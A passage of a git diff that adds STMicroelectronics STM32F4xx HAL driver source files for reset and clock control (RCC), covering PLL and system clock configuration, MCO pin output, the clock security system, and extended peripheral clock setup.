RCC_PLLCFGR_PLLR_Pos))) +#else + if (((RCC_OscInitStruct->PLL.PLLState) == RCC_PLL_OFF) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLSRC) != RCC_OscInitStruct->PLL.PLLSource) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLM) != (RCC_OscInitStruct->PLL.PLLM) << RCC_PLLCFGR_PLLM_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLN) != (RCC_OscInitStruct->PLL.PLLN) << RCC_PLLCFGR_PLLN_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLP) != (((RCC_OscInitStruct->PLL.PLLP >> 1U) - 1U)) << RCC_PLLCFGR_PLLP_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLQ) != (RCC_OscInitStruct->PLL.PLLQ << RCC_PLLCFGR_PLLQ_Pos))) +#endif + { + return HAL_ERROR; + } + } + } + } + return HAL_OK; +} + +/** + * @brief Initializes the CPU, AHB and APB busses clocks according to the specified + * parameters in the RCC_ClkInitStruct. + * @param RCC_ClkInitStruct pointer to an RCC_OscInitTypeDef structure that + * contains the configuration information for the RCC peripheral. + * @param FLatency FLASH Latency, this parameter depend on device selected + * + * @note The SystemCoreClock CMSIS variable is used to store System Clock Frequency + * and updated by HAL_RCC_GetHCLKFreq() function called within this function + * + * @note The HSI is used (enabled by hardware) as system clock source after + * startup from Reset, wake-up from STOP and STANDBY mode, or in case + * of failure of the HSE used directly or indirectly as system clock + * (if the Clock Security System CSS is enabled). + * + * @note A switch from one clock source to another occurs only if the target + * clock source is ready (clock stable after startup delay or PLL locked). + * If a clock source which is not yet ready is selected, the switch will + * occur when the clock source will be ready. + * + * @note Depending on the device voltage range, the software has to set correctly + * HPRE[3:0] bits to ensure that HCLK not exceed the maximum allowed frequency + * (for more details refer to section above "Initialization/de-initialization functions") + * @retval None + */ +HAL_StatusTypeDef HAL_RCC_ClockConfig(RCC_ClkInitTypeDef *RCC_ClkInitStruct, uint32_t FLatency) +{ + uint32_t tickstart; + + /* Check Null pointer */ + if(RCC_ClkInitStruct == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_RCC_CLOCKTYPE(RCC_ClkInitStruct->ClockType)); + assert_param(IS_FLASH_LATENCY(FLatency)); + + /* To correctly read data from FLASH memory, the number of wait states (LATENCY) + must be correctly programmed according to the frequency of the CPU clock + (HCLK) and the supply voltage of the device. */ + + /* Increasing the number of wait states because of higher CPU frequency */ + if(FLatency > __HAL_FLASH_GET_LATENCY()) + { + /* Program the new number of wait states to the LATENCY bits in the FLASH_ACR register */ + __HAL_FLASH_SET_LATENCY(FLatency); + + /* Check that the new number of wait states is taken into account to access the Flash + memory by reading the FLASH_ACR register */ + if(__HAL_FLASH_GET_LATENCY() != FLatency) + { + return HAL_ERROR; + } + } + + /*-------------------------- HCLK Configuration --------------------------*/ + if(((RCC_ClkInitStruct->ClockType) & RCC_CLOCKTYPE_HCLK) == RCC_CLOCKTYPE_HCLK) + { + /* Set the highest APBx dividers in order to ensure that we do not go through + a non-spec phase whatever we decrease or increase HCLK. */ + if(((RCC_ClkInitStruct->ClockType) & RCC_CLOCKTYPE_PCLK1) == RCC_CLOCKTYPE_PCLK1) + { + MODIFY_REG(RCC->CFGR, RCC_CFGR_PPRE1, RCC_HCLK_DIV16); + } + + if(((RCC_ClkInitStruct->ClockType) & RCC_CLOCKTYPE_PCLK2) == RCC_CLOCKTYPE_PCLK2) + { + MODIFY_REG(RCC->CFGR, RCC_CFGR_PPRE2, (RCC_HCLK_DIV16 << 3)); + } + + assert_param(IS_RCC_HCLK(RCC_ClkInitStruct->AHBCLKDivider)); + MODIFY_REG(RCC->CFGR, RCC_CFGR_HPRE, RCC_ClkInitStruct->AHBCLKDivider); + } + + /*------------------------- SYSCLK Configuration ---------------------------*/ + if(((RCC_ClkInitStruct->ClockType) & RCC_CLOCKTYPE_SYSCLK) == RCC_CLOCKTYPE_SYSCLK) + { + assert_param(IS_RCC_SYSCLKSOURCE(RCC_ClkInitStruct->SYSCLKSource)); + + /* HSE is selected as System Clock Source */ + if(RCC_ClkInitStruct->SYSCLKSource == RCC_SYSCLKSOURCE_HSE) + { + /* Check the HSE ready flag */ + if(__HAL_RCC_GET_FLAG(RCC_FLAG_HSERDY) == RESET) + { + return HAL_ERROR; + } + } + /* PLL is selected as System Clock Source */ + else if((RCC_ClkInitStruct->SYSCLKSource == RCC_SYSCLKSOURCE_PLLCLK) || + (RCC_ClkInitStruct->SYSCLKSource == RCC_SYSCLKSOURCE_PLLRCLK)) + { + /* Check the PLL ready flag */ + if(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLRDY) == RESET) + { + return HAL_ERROR; + } + } + /* HSI is selected as System Clock Source */ + else + { + /* Check the HSI ready flag */ + if(__HAL_RCC_GET_FLAG(RCC_FLAG_HSIRDY) == RESET) + { + return HAL_ERROR; + } + } + + __HAL_RCC_SYSCLK_CONFIG(RCC_ClkInitStruct->SYSCLKSource); + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + while (__HAL_RCC_GET_SYSCLK_SOURCE() != (RCC_ClkInitStruct->SYSCLKSource << RCC_CFGR_SWS_Pos)) + { + if ((HAL_GetTick() - tickstart) > CLOCKSWITCH_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + + /* Decreasing the number of wait states because of lower CPU frequency */ + if(FLatency < __HAL_FLASH_GET_LATENCY()) + { + /* Program the new number of wait states to the LATENCY bits in the FLASH_ACR register */ + __HAL_FLASH_SET_LATENCY(FLatency); + + /* Check that the new number of wait states is taken into account to access the Flash + memory by reading the FLASH_ACR register */ + if(__HAL_FLASH_GET_LATENCY() != FLatency) + { + return HAL_ERROR; + } + } + + /*-------------------------- PCLK1 Configuration ---------------------------*/ + if(((RCC_ClkInitStruct->ClockType) & RCC_CLOCKTYPE_PCLK1) == RCC_CLOCKTYPE_PCLK1) + { + assert_param(IS_RCC_PCLK(RCC_ClkInitStruct->APB1CLKDivider)); + MODIFY_REG(RCC->CFGR, RCC_CFGR_PPRE1, RCC_ClkInitStruct->APB1CLKDivider); + } + + /*-------------------------- PCLK2 Configuration ---------------------------*/ + if(((RCC_ClkInitStruct->ClockType) & RCC_CLOCKTYPE_PCLK2) == RCC_CLOCKTYPE_PCLK2) + { + assert_param(IS_RCC_PCLK(RCC_ClkInitStruct->APB2CLKDivider)); + MODIFY_REG(RCC->CFGR, RCC_CFGR_PPRE2, ((RCC_ClkInitStruct->APB2CLKDivider) << 3U)); + } + + /* Update the SystemCoreClock global variable */ + SystemCoreClock = HAL_RCC_GetSysClockFreq() >> AHBPrescTable[(RCC->CFGR & RCC_CFGR_HPRE)>> RCC_CFGR_HPRE_Pos]; + + /* Configure the source of time base considering new system clocks settings */ + HAL_InitTick (uwTickPrio); + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup RCC_Exported_Functions_Group2 Peripheral Control functions + * @brief RCC clocks control functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to control the RCC Clocks + frequencies. + +@endverbatim + * @{ + */ + +/** + * @brief Selects the clock source to output on MCO1 pin(PA8) or on MCO2 pin(PC9). + * @note PA8/PC9 should be configured in alternate function mode. + * @param RCC_MCOx specifies the output direction for the clock source. + * This parameter can be one of the following values: + * @arg RCC_MCO1: Clock source to output on MCO1 pin(PA8). + * @arg RCC_MCO2: Clock source to output on MCO2 pin(PC9). + * @param RCC_MCOSource specifies the clock source to output. + * This parameter can be one of the following values: + * @arg RCC_MCO1SOURCE_HSI: HSI clock selected as MCO1 source + * @arg RCC_MCO1SOURCE_LSE: LSE clock selected as MCO1 source + * @arg RCC_MCO1SOURCE_HSE: HSE clock selected as MCO1 source + * @arg RCC_MCO1SOURCE_PLLCLK: main PLL clock selected as MCO1 source + * @arg RCC_MCO2SOURCE_SYSCLK: System clock (SYSCLK) selected as MCO2 source + * @arg RCC_MCO2SOURCE_PLLI2SCLK: PLLI2S clock selected as MCO2 source, available for all STM32F4 devices except STM32F410xx + * @arg RCC_MCO2SOURCE_I2SCLK: I2SCLK clock selected as MCO2 source, available only for STM32F410Rx devices + * @arg RCC_MCO2SOURCE_HSE: HSE clock selected as MCO2 source + * @arg RCC_MCO2SOURCE_PLLCLK: main PLL clock selected as MCO2 source + * @param RCC_MCODiv specifies the MCOx prescaler. + * This parameter can be one of the following values: + * @arg RCC_MCODIV_1: no division applied to MCOx clock + * @arg RCC_MCODIV_2: division by 2 applied to MCOx clock + * @arg RCC_MCODIV_3: division by 3 applied to MCOx clock + * @arg RCC_MCODIV_4: division by 4 applied to MCOx clock + * @arg RCC_MCODIV_5: division by 5 applied to MCOx clock + * @note For STM32F410Rx devices to output I2SCLK clock on MCO2 you should have + * at last one of the SPI clocks enabled (SPI1, SPI2 or SPI5). + * @retval None + */ +void HAL_RCC_MCOConfig(uint32_t RCC_MCOx, uint32_t RCC_MCOSource, uint32_t RCC_MCODiv) +{ + GPIO_InitTypeDef GPIO_InitStruct; + /* Check the parameters */ + assert_param(IS_RCC_MCO(RCC_MCOx)); + assert_param(IS_RCC_MCODIV(RCC_MCODiv)); + /* RCC_MCO1 */ + if(RCC_MCOx == RCC_MCO1) + { + assert_param(IS_RCC_MCO1SOURCE(RCC_MCOSource)); + + /* MCO1 Clock Enable */ + __MCO1_CLK_ENABLE(); + + /* Configure the MCO1 pin in alternate function mode */ + GPIO_InitStruct.Pin = MCO1_PIN; + GPIO_InitStruct.Mode = GPIO_MODE_AF_PP; + GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_VERY_HIGH; + GPIO_InitStruct.Pull = GPIO_NOPULL; + GPIO_InitStruct.Alternate = GPIO_AF0_MCO; + HAL_GPIO_Init(MCO1_GPIO_PORT, &GPIO_InitStruct); + + /* Mask MCO1 and MCO1PRE[2:0] bits then Select MCO1 clock source and prescaler */ + MODIFY_REG(RCC->CFGR, (RCC_CFGR_MCO1 | RCC_CFGR_MCO1PRE), (RCC_MCOSource | RCC_MCODiv)); + + /* This RCC MCO1 enable feature is available only on STM32F410xx devices */ +#if defined(RCC_CFGR_MCO1EN) + __HAL_RCC_MCO1_ENABLE(); +#endif /* RCC_CFGR_MCO1EN */ + } +#if defined(RCC_CFGR_MCO2) + else + { + assert_param(IS_RCC_MCO2SOURCE(RCC_MCOSource)); + + /* MCO2 Clock Enable */ + __MCO2_CLK_ENABLE(); + + /* Configure the MCO2 pin in alternate function mode */ + GPIO_InitStruct.Pin = MCO2_PIN; + GPIO_InitStruct.Mode = GPIO_MODE_AF_PP; + GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_VERY_HIGH; + GPIO_InitStruct.Pull = GPIO_NOPULL; + GPIO_InitStruct.Alternate = GPIO_AF0_MCO; + HAL_GPIO_Init(MCO2_GPIO_PORT, &GPIO_InitStruct); + + /* Mask MCO2 and MCO2PRE[2:0] bits then Select MCO2 clock source and prescaler */ + MODIFY_REG(RCC->CFGR, (RCC_CFGR_MCO2 | RCC_CFGR_MCO2PRE), (RCC_MCOSource | (RCC_MCODiv << 3U))); + + /* This RCC MCO2 enable feature is available only on STM32F410Rx devices */ +#if defined(RCC_CFGR_MCO2EN) + __HAL_RCC_MCO2_ENABLE(); +#endif /* RCC_CFGR_MCO2EN */ + } +#endif /* RCC_CFGR_MCO2 */ +} + +/** + * @brief Enables the Clock Security System. + * @note If a failure is detected on the HSE oscillator clock, this oscillator + * is automatically disabled and an interrupt is generated to inform the + * software about the failure (Clock Security System Interrupt, CSSI), + * allowing the MCU to perform rescue operations. The CSSI is linked to + * the Cortex-M4 NMI (Non-Maskable Interrupt) exception vector. + * @retval None + */ +void HAL_RCC_EnableCSS(void) +{ + *(__IO uint32_t *) RCC_CR_CSSON_BB = (uint32_t)ENABLE; +} + +/** + * @brief Disables the Clock Security System. + * @retval None + */ +void HAL_RCC_DisableCSS(void) +{ + *(__IO uint32_t *) RCC_CR_CSSON_BB = (uint32_t)DISABLE; +} + +/** + * @brief Returns the SYSCLK frequency + * + * @note The system frequency computed by this function is not the real + * frequency in the chip. It is calculated based on the predefined + * constant and the selected clock source: + * @note If SYSCLK source is HSI, function returns values based on HSI_VALUE(*) + * @note If SYSCLK source is HSE, function returns values based on HSE_VALUE(**) + * @note If SYSCLK source is PLL, function returns values based on HSE_VALUE(**) + * or HSI_VALUE(*) multiplied/divided by the PLL factors. + * @note (*) HSI_VALUE is a constant defined in stm32f4xx_hal_conf.h file (default value + * 16 MHz) but the real value may vary depending on the variations + * in voltage and temperature. + * @note (**) HSE_VALUE is a constant defined in stm32f4xx_hal_conf.h file (default value + * 25 MHz), user has to ensure that HSE_VALUE is same as the real + * frequency of the crystal used. Otherwise, this function may + * have wrong result. + * + * @note The result of this function could be not correct when using fractional + * value for HSE crystal. + * + * @note This function can be used by the user application to compute the + * baudrate for the communication peripherals or configure other parameters. + * + * @note Each time SYSCLK changes, this function must be called to update the + * right SYSCLK value. Otherwise, any configuration based on this function will be incorrect. + * + * + * @retval SYSCLK frequency + */ +__weak uint32_t HAL_RCC_GetSysClockFreq(void) +{ + uint32_t pllm = 0U, pllvco = 0U, pllp = 0U; + uint32_t sysclockfreq = 0U; + + /* Get SYSCLK source -------------------------------------------------------*/ + switch (RCC->CFGR & RCC_CFGR_SWS) + { + case RCC_CFGR_SWS_HSI: /* HSI used as system clock source */ + { + sysclockfreq = HSI_VALUE; + break; + } + case RCC_CFGR_SWS_HSE: /* HSE used as system clock source */ + { + sysclockfreq = HSE_VALUE; + break; + } + case RCC_CFGR_SWS_PLL: /* PLL used as system clock source */ + { + /* PLL_VCO = (HSE_VALUE or HSI_VALUE / PLLM) * PLLN + SYSCLK = PLL_VCO / PLLP */ + pllm = RCC->PLLCFGR & RCC_PLLCFGR_PLLM; + if(__HAL_RCC_GET_PLL_OSCSOURCE() != RCC_PLLSOURCE_HSI) + { + /* HSE used as PLL clock source */ + pllvco = (uint32_t) ((((uint64_t) HSE_VALUE * ((uint64_t) ((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> RCC_PLLCFGR_PLLN_Pos)))) / (uint64_t)pllm); + } + else + { + /* HSI used as PLL clock source */ + pllvco = (uint32_t) ((((uint64_t) HSI_VALUE * ((uint64_t) ((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> RCC_PLLCFGR_PLLN_Pos)))) / (uint64_t)pllm); + } + pllp = ((((RCC->PLLCFGR & RCC_PLLCFGR_PLLP) >> RCC_PLLCFGR_PLLP_Pos) + 1U) *2U); + + sysclockfreq = pllvco/pllp; + break; + } + default: + { + sysclockfreq = HSI_VALUE; + break; + } + } + return sysclockfreq; +} + +/** + * @brief Returns the HCLK frequency + * @note Each time HCLK changes, this function must be called to update the + * right HCLK value. Otherwise, any configuration based on this function will be incorrect. + * + * @note The SystemCoreClock CMSIS variable is used to store System Clock Frequency + * and updated within this function + * @retval HCLK frequency + */ +uint32_t HAL_RCC_GetHCLKFreq(void) +{ + return SystemCoreClock; +} + +/** + * @brief Returns the PCLK1 frequency + * @note Each time PCLK1 changes, this function must be called to update the + * right PCLK1 value. Otherwise, any configuration based on this function will be incorrect. + * @retval PCLK1 frequency + */ +uint32_t HAL_RCC_GetPCLK1Freq(void) +{ + /* Get HCLK source and Compute PCLK1 frequency ---------------------------*/ + return (HAL_RCC_GetHCLKFreq() >> APBPrescTable[(RCC->CFGR & RCC_CFGR_PPRE1)>> RCC_CFGR_PPRE1_Pos]); +} + +/** + * @brief Returns the PCLK2 frequency + * @note Each time PCLK2 changes, this function must be called to update the + * right PCLK2 value. Otherwise, any configuration based on this function will be incorrect. + * @retval PCLK2 frequency + */ +uint32_t HAL_RCC_GetPCLK2Freq(void) +{ + /* Get HCLK source and Compute PCLK2 frequency ---------------------------*/ + return (HAL_RCC_GetHCLKFreq()>> APBPrescTable[(RCC->CFGR & RCC_CFGR_PPRE2)>> RCC_CFGR_PPRE2_Pos]); +} + +/** + * @brief Configures the RCC_OscInitStruct according to the internal + * RCC configuration registers. + * @param RCC_OscInitStruct pointer to an RCC_OscInitTypeDef structure that + * will be configured. + * @retval None + */ +__weak void HAL_RCC_GetOscConfig(RCC_OscInitTypeDef *RCC_OscInitStruct) +{ + /* Set all possible values for the Oscillator type parameter ---------------*/ + RCC_OscInitStruct->OscillatorType = RCC_OSCILLATORTYPE_HSE | RCC_OSCILLATORTYPE_HSI | RCC_OSCILLATORTYPE_LSE | RCC_OSCILLATORTYPE_LSI; + + /* Get the HSE configuration -----------------------------------------------*/ + if((RCC->CR &RCC_CR_HSEBYP) == RCC_CR_HSEBYP) + { + RCC_OscInitStruct->HSEState = RCC_HSE_BYPASS; + } + else if((RCC->CR &RCC_CR_HSEON) == RCC_CR_HSEON) + { + RCC_OscInitStruct->HSEState = RCC_HSE_ON; + } + else + { + RCC_OscInitStruct->HSEState = RCC_HSE_OFF; + } + + /* Get the HSI configuration -----------------------------------------------*/ + if((RCC->CR &RCC_CR_HSION) == RCC_CR_HSION) + { + RCC_OscInitStruct->HSIState = RCC_HSI_ON; + } + else + { + RCC_OscInitStruct->HSIState = RCC_HSI_OFF; + } + + RCC_OscInitStruct->HSICalibrationValue = (uint32_t)((RCC->CR &RCC_CR_HSITRIM) >> RCC_CR_HSITRIM_Pos); + + /* Get the LSE configuration -----------------------------------------------*/ + if((RCC->BDCR &RCC_BDCR_LSEBYP) == RCC_BDCR_LSEBYP) + { + RCC_OscInitStruct->LSEState = RCC_LSE_BYPASS; + } + else if((RCC->BDCR &RCC_BDCR_LSEON) == RCC_BDCR_LSEON) + { + RCC_OscInitStruct->LSEState = RCC_LSE_ON; + } + else + { + RCC_OscInitStruct->LSEState = RCC_LSE_OFF; + } + + /* Get the LSI configuration -----------------------------------------------*/ + if((RCC->CSR &RCC_CSR_LSION) == RCC_CSR_LSION) + { + RCC_OscInitStruct->LSIState = RCC_LSI_ON; + } + else + { + RCC_OscInitStruct->LSIState = RCC_LSI_OFF; + } + + /* Get the PLL configuration -----------------------------------------------*/ + if((RCC->CR &RCC_CR_PLLON) == RCC_CR_PLLON) + { + RCC_OscInitStruct->PLL.PLLState = RCC_PLL_ON; + } + else + { + RCC_OscInitStruct->PLL.PLLState = RCC_PLL_OFF; + } + RCC_OscInitStruct->PLL.PLLSource = (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC); + RCC_OscInitStruct->PLL.PLLM = (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM); + RCC_OscInitStruct->PLL.PLLN = (uint32_t)((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> RCC_PLLCFGR_PLLN_Pos); + RCC_OscInitStruct->PLL.PLLP = (uint32_t)((((RCC->PLLCFGR & RCC_PLLCFGR_PLLP) + RCC_PLLCFGR_PLLP_0) << 1U) >> RCC_PLLCFGR_PLLP_Pos); + RCC_OscInitStruct->PLL.PLLQ = (uint32_t)((RCC->PLLCFGR & RCC_PLLCFGR_PLLQ) >> RCC_PLLCFGR_PLLQ_Pos); +} + +/** + * @brief Configures the RCC_ClkInitStruct according to the internal + * RCC configuration registers. + * @param RCC_ClkInitStruct pointer to an RCC_ClkInitTypeDef structure that + * will be configured. + * @param pFLatency Pointer on the Flash Latency. + * @retval None + */ +void HAL_RCC_GetClockConfig(RCC_ClkInitTypeDef *RCC_ClkInitStruct, uint32_t *pFLatency) +{ + /* Set all possible values for the Clock type parameter --------------------*/ + RCC_ClkInitStruct->ClockType = RCC_CLOCKTYPE_SYSCLK | RCC_CLOCKTYPE_HCLK | RCC_CLOCKTYPE_PCLK1 | RCC_CLOCKTYPE_PCLK2; + + /* Get the SYSCLK configuration --------------------------------------------*/ + RCC_ClkInitStruct->SYSCLKSource = (uint32_t)(RCC->CFGR & RCC_CFGR_SW); + + /* Get the HCLK configuration ----------------------------------------------*/ + RCC_ClkInitStruct->AHBCLKDivider = (uint32_t)(RCC->CFGR & RCC_CFGR_HPRE); + + /* Get the APB1 configuration ----------------------------------------------*/ + RCC_ClkInitStruct->APB1CLKDivider = (uint32_t)(RCC->CFGR & RCC_CFGR_PPRE1); + + /* Get the APB2 configuration ----------------------------------------------*/ + RCC_ClkInitStruct->APB2CLKDivider = (uint32_t)((RCC->CFGR & RCC_CFGR_PPRE2) >> 3U); + + /* Get the Flash Wait State (Latency) configuration ------------------------*/ + *pFLatency = (uint32_t)(FLASH->ACR & FLASH_ACR_LATENCY); +} + +/** + * @brief This function handles the RCC CSS interrupt request. + * @note This API should be called under the NMI_Handler(). + * @retval None + */ +void HAL_RCC_NMI_IRQHandler(void) +{ + /* Check RCC CSSF flag */ + if(__HAL_RCC_GET_IT(RCC_IT_CSS)) + { + /* RCC Clock Security System interrupt user callback */ + HAL_RCC_CSSCallback(); + + /* Clear RCC CSS pending bit */ + __HAL_RCC_CLEAR_IT(RCC_IT_CSS); + } +} + +/** + * @brief RCC Clock Security System interrupt callback + * @retval None + */ +__weak void HAL_RCC_CSSCallback(void) +{ + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_RCC_CSSCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_RCC_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rcc_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rcc_ex.c new file mode 100644 index 000000000..e42b850a6 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rcc_ex.c @@ -0,0 +1,3787 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_rcc_ex.c + * @author MCD Application Team + * @brief Extension RCC HAL module driver. + * This file provides firmware functions to manage the following + * functionalities RCC extension peripheral: + * + Extended Peripheral Control functions + * + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup RCCEx RCCEx + * @brief RCCEx HAL module driver + * @{ + */ + +#ifdef HAL_RCC_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup RCCEx_Private_Constants + * @{ + */ +/** + * @} + */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/** @defgroup RCCEx_Exported_Functions RCCEx Exported Functions + * @{ + */ + +/** @defgroup RCCEx_Exported_Functions_Group1 Extended Peripheral Control functions + * @brief Extended Peripheral Control functions + * +@verbatim + =============================================================================== + ##### Extended Peripheral Control functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to control the RCC Clocks + frequencies. + [..] + (@) Important note: Care must be taken when HAL_RCCEx_PeriphCLKConfig() is used to + select the RTC clock source; in this case the Backup domain will be reset in + order to modify the RTC Clock source, as consequence RTC registers (including + the backup registers) and RCC_BDCR register are set to their reset values. + +@endverbatim + * @{ + */ + +#if defined(STM32F446xx) +/** + * @brief Initializes the RCC extended peripherals clocks according to the specified + * parameters in the RCC_PeriphCLKInitTypeDef. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * contains the configuration information for the Extended Peripherals + * clocks(I2S, SAI, LTDC RTC and TIM). + * + * @note Care must be taken when HAL_RCCEx_PeriphCLKConfig() is used to select + * the RTC clock source; in this case the Backup domain will be reset in + * order to modify the RTC Clock source, as consequence RTC registers (including + * the backup registers) and RCC_BDCR register are set to their reset values. + * + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCCEx_PeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tickstart = 0U; + uint32_t tmpreg1 = 0U; + uint32_t plli2sp = 0U; + uint32_t plli2sq = 0U; + uint32_t plli2sr = 0U; + uint32_t pllsaip = 0U; + uint32_t pllsaiq = 0U; + uint32_t plli2sused = 0U; + uint32_t pllsaiused = 0U; + + /* Check the peripheral clock selection parameters */ + assert_param(IS_RCC_PERIPHCLOCK(PeriphClkInit->PeriphClockSelection)); + + /*------------------------ I2S APB1 configuration --------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S_APB1) == (RCC_PERIPHCLK_I2S_APB1)) + { + /* Check the parameters */ + assert_param(IS_RCC_I2SAPB1CLKSOURCE(PeriphClkInit->I2sApb1ClockSelection)); + + /* Configure I2S Clock source */ + __HAL_RCC_I2S_APB1_CONFIG(PeriphClkInit->I2sApb1ClockSelection); + /* Enable the PLLI2S when it's used as clock source for I2S */ + if(PeriphClkInit->I2sApb1ClockSelection == RCC_I2SAPB1CLKSOURCE_PLLI2S) + { + plli2sused = 1U; + } + } + /*--------------------------------------------------------------------------*/ + + /*---------------------------- I2S APB2 configuration ----------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S_APB2) == (RCC_PERIPHCLK_I2S_APB2)) + { + /* Check the parameters */ + assert_param(IS_RCC_I2SAPB2CLKSOURCE(PeriphClkInit->I2sApb2ClockSelection)); + + /* Configure I2S Clock source */ + __HAL_RCC_I2S_APB2_CONFIG(PeriphClkInit->I2sApb2ClockSelection); + /* Enable the PLLI2S when it's used as clock source for I2S */ + if(PeriphClkInit->I2sApb2ClockSelection == RCC_I2SAPB2CLKSOURCE_PLLI2S) + { + plli2sused = 1U; + } + } + /*--------------------------------------------------------------------------*/ + + /*--------------------------- SAI1 configuration ---------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI1) == (RCC_PERIPHCLK_SAI1)) + { + /* Check the parameters */ + assert_param(IS_RCC_SAI1CLKSOURCE(PeriphClkInit->Sai1ClockSelection)); + + /* Configure SAI1 Clock source */ + __HAL_RCC_SAI1_CONFIG(PeriphClkInit->Sai1ClockSelection); + /* Enable the PLLI2S when it's used as clock source for SAI */ + if(PeriphClkInit->Sai1ClockSelection == RCC_SAI1CLKSOURCE_PLLI2S) + { + plli2sused = 1U; + } + /* Enable the PLLSAI when it's used as clock source for SAI */ + if(PeriphClkInit->Sai1ClockSelection == RCC_SAI1CLKSOURCE_PLLSAI) + { + pllsaiused = 1U; + } + } + /*--------------------------------------------------------------------------*/ + + /*-------------------------- SAI2 configuration ----------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI2) == (RCC_PERIPHCLK_SAI2)) + { + /* Check the parameters */ + assert_param(IS_RCC_SAI2CLKSOURCE(PeriphClkInit->Sai2ClockSelection)); + + /* Configure SAI2 Clock source */ + __HAL_RCC_SAI2_CONFIG(PeriphClkInit->Sai2ClockSelection); + + /* Enable the PLLI2S when it's used as clock source for SAI */ + if(PeriphClkInit->Sai2ClockSelection == RCC_SAI2CLKSOURCE_PLLI2S) + { + plli2sused = 1U; + } + /* Enable the PLLSAI when it's used as clock source for SAI */ + if(PeriphClkInit->Sai2ClockSelection == RCC_SAI2CLKSOURCE_PLLSAI) + { + pllsaiused = 1U; + } + } + /*--------------------------------------------------------------------------*/ + + /*----------------------------- RTC configuration --------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_RTC) == (RCC_PERIPHCLK_RTC)) + { + /* Check for RTC Parameters used to output RTCCLK */ + assert_param(IS_RCC_RTCCLKSOURCE(PeriphClkInit->RTCClockSelection)); + + /* Enable Power Clock*/ + __HAL_RCC_PWR_CLK_ENABLE(); + + /* Enable write access to Backup domain */ + PWR->CR |= PWR_CR_DBP; + + /* Get tick */ + tickstart = HAL_GetTick(); + + while((PWR->CR & PWR_CR_DBP) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_DBP_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + /* Reset the Backup domain only if the RTC Clock source selection is modified from reset value */ + tmpreg1 = (RCC->BDCR & RCC_BDCR_RTCSEL); + if((tmpreg1 != 0x00000000U) && ((tmpreg1) != (PeriphClkInit->RTCClockSelection & RCC_BDCR_RTCSEL))) + { + /* Store the content of BDCR register before the reset of Backup Domain */ + tmpreg1 = (RCC->BDCR & ~(RCC_BDCR_RTCSEL)); + /* RTC Clock selection can be changed only if the Backup Domain is reset */ + __HAL_RCC_BACKUPRESET_FORCE(); + __HAL_RCC_BACKUPRESET_RELEASE(); + /* Restore the Content of BDCR register */ + RCC->BDCR = tmpreg1; + + /* Wait for LSE reactivation if LSE was enable prior to Backup Domain reset */ + if(HAL_IS_BIT_SET(RCC->BDCR, RCC_BDCR_LSEON)) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till LSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSERDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_LSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + __HAL_RCC_RTC_CONFIG(PeriphClkInit->RTCClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*---------------------------- TIM configuration ---------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_TIM) == (RCC_PERIPHCLK_TIM)) + { + /* Configure Timer Prescaler */ + __HAL_RCC_TIMCLKPRESCALER(PeriphClkInit->TIMPresSelection); + } + 